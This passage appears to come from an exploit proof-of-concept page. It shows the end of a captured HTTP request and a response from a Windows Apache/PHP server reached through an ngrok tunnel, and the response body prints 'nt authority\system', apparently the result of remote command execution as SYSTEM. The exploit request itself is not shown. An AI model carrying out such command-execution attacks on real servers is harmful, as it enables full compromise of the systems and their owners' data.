navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailers==============> END REQUEST <======================================================> START RESPONSE <========================================HTTP/2 200 OKContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:13:14 GMTNgrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919Server: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: PHP/7.4.26Content-Length: 32<pre>nt authority\system</pre>==============> END RESPONSE <========================================

Tag

#firefox